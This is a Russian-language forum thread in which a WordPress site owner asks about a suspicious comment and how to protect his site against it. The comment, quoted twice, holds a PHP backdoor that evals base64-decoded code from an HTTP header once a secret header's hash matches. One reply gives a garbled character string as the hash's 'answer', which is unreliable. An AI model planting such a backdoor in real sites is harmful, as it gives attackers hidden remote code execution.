Вопрос по WP

[JetNet]

Форумчане, подскажите, что за беда. Прилетел комментарий следующего содержания:

Комментарий:
JAKqOxsoGH<!--mfunc if(isset($_SERVER['HTTP_SUM'])) { if (sha1($_SERVER['HTTP_SUM']) == 'a19de0dad29d947840c44881188ce86972e2efa9' ) { eval(base64_decode($_SERVER['HTTP_CMD'])); } } --><!--/mfunc-->

Что это и как с этим бороться?

 

[Rivek]

Форумчане, подскажите, что за беда. Прилетел комментарий следующего содержания:

Комментарий:
JAKqOxsoGH<!--mfunc if(isset($_SERVER['HTTP_SUM'])) { if (sha1($_SERVER['HTTP_SUM']) == 'a19de0dad29d947840c44881188ce86972e2efa9' ) { eval(base64_decode($_SERVER['HTTP_CMD'])); } } --><!--/mfunc-->

Что это и как с этим бороться?

Скорее всего шелл или стучалка
строка a19de0dad29d947840c44881188ce86972e2efa9 имеет такой ответ k_]{GZwo]玼ㇸ㏵׏{ν臨y潀
base64_decode опасная штука
почитай Для просмотра ссылки Войди или Зарегистрируйся

 

[JetNet]

Что можно сделать и как проверить залили или нет? Судя по времени изменения файлов, ничего не изменялось.

 

[Rivek]

Что можно сделать и как проверить залили или нет? Судя по времени изменения файлов, ничего не изменялось.

Я думаю не залили. Это уязвимость для wp через комментарий. тут тоже можешь Для просмотра ссылки Войди или Зарегистрируйся

 

[JetNet]

Спасибо, посмотрел, почитал. Но комменты отключены, а версия WP уже давно 4.4, а проблема с 0day относится к 4.2. и ранее. Можно как-то обезопаситься от этого?